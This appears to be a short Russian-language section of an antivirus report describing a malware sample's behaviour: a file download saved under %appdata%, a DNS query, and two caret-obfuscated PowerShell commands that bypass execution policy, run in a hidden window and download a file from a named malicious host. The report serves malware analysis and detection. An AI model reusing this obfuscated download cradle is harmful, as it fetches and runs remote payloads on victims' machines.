Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^w^e^r^S^HE^ll.exE ^-eX^EC^utIO^NP^oLI^Cy ^b^YP^ass -n^o^p^rofIle ^-wiNdO^Wstyle^ HI^D^D^eN (NEw-Obj^E^cT^ systeM.^Ne^T.w^ebc^LIENT).^DoW^nlO^aDf^Il^E('http://www.zonedopesa....
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "po^w^e^r^S^HE^ll.exE ^-eX^EC^utIO^NP^oLI^Cy ^b^YP^ass -n^o^p^rofIle ^-wiNdO^Wstyle^ HI^D^D^eN (NEw-Obj^E^cT^ systeM.^Ne^T.w^ebc^LIENT).^DoW^nlO^aDf^Il^E('http://www.zonedopesa....' (со скрытым окном)